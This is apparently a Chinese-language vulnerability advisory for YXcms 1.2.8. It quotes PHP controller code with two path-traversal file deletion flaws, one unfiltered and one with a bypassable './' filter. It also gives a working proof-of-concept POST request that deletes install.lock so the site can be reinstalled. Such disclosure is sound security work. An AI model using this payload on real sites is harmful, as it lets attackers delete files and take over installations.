YXcms1.2.8两处任意文件删除可reinstall

### 简要描述： 1.2.8 ### 详细说明： 一处没有过滤，一处过滤失误 第一处：/protected/apps/member/controller/inforController.php ``` public function index() { $auth=$this->auth; $id=$auth['id']; if(!$this->isPost()){ $info=model('members')->find("id='{$id}'"); $this->info=$info; $this->path=__ROOT__.'https://images.seebug.org/upload/member/image/'; $this->twidth=config('HEAD_W'); $this->theight=config('HEAD_H'); $this->display(); }else{ if(!empty($_POST['email']) && !Check::email(trim($_POST['email']))) $this->error('邮箱格式错误~'); $data['nickname']=in(trim($_POST['nickname'])); $acc=model('members')->find("id!='{$id}' AND nickname='".$data['nickname']."'"); if(!empty($acc['nickname'])) $this->error('该昵称已经有人使用~'); if (empty($_FILES['headpic']['name']) === false){ $tfile=date("Ymd"); $imgupload= $this->upload($this->uploadpath.$tfile.'/',config('imgupSize'),'jpg,bmp,gif,png'); $imgupload->saveRule='thumb_'.time(); $imgupload->upload(); $fileinfo=$imgupload->getUploadFileInfo(); $errorinfo=$imgupload->getErrorMsg(); if(!empty($errorinfo)) $this->alert($errorinfo); else{ if(!empty($_POST['oldheadpic'])){ $picpath=$this->uploadpath.$_POST['oldheadpic']; if(file_exists($picpath)) @unlink($picpath); //修改个人资料时没有对$_POST['oldheadpic']参数进行过滤，可以传入../ } $data['headpic']=$tfile.'/'.$fileinfo[0]['savename']; } } $data['email']=in($_POST['email']); $data['tel']=in($_POST['tel']); $data['qq']=in($_POST['qq']); model('members')->update("id='{$id}'",$data); $info=model('members')->find("id='{$id}'"); if($info['headpic'] && !Check::url($info['headpic'])) $info['headpic']=__UPLOAD__.'/member/image/'.$info['headpic']; $cookie_auth = $info['id'].'\t'.$info['groupid'].'\t'.$info['account'].'\t'.$info['nickname'].'\t'.$info['lastip'].'\t'.$info['headpic']; set_cookie('auth',$cookie_auth,0); $this->success('信息编辑成功~'); } } ``` 第二处：/protected/apps/member/controller/newsController.php 过滤失误 ``` //封面图删除 public function delcover() { //文件保存目录 $id=in($_POST['id']); $pic=in($_POST['pic']); $pic=str_replace('./', '', $pic); //将./过滤为空，使用../..//将变成../ $data['picture']= $this->nopic; if(model('news')->update("id='$id' and account='".$this->mesprefix.$this->auth['account']."'",$data)){ $picpath=$this->uploadpath.$pic; echo $picpath; if(file_exists($picpath)) @unlink($picpath); echo 1; }else echo '删除封面失败~'; } ``` ### 漏洞证明： POC1： [<img src="https://images.seebug.org/upload/201505/0520012823c032376c007e343d7b78e345da892c.png" alt="屏幕快照 2015-05-05 下午8.01.09.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/0520012823c032376c007e343d7b78e345da892c.png) POC2: http://localhost/index.php?r=member/news/delcover POST:id=17&pic=../..//../..//../..//protected/apps/install/install.lock [<img src="https://images.seebug.org/upload/201505/05195555b74228a51dd9f148e2356fe39dd7b166.png" alt="屏幕快照 2015-05-05 下午7.55.00.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/05195555b74228a51dd9f148e2356fe39dd7b166.png) [<img src="https://images.seebug.org/upload/201505/051956049383ca8ac4b5d70eeebfefe13e847653.png" alt="屏幕快照 2015-05-05 下午7.55.32.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/051956049383ca8ac4b5d70eeebfefe13e847653.png)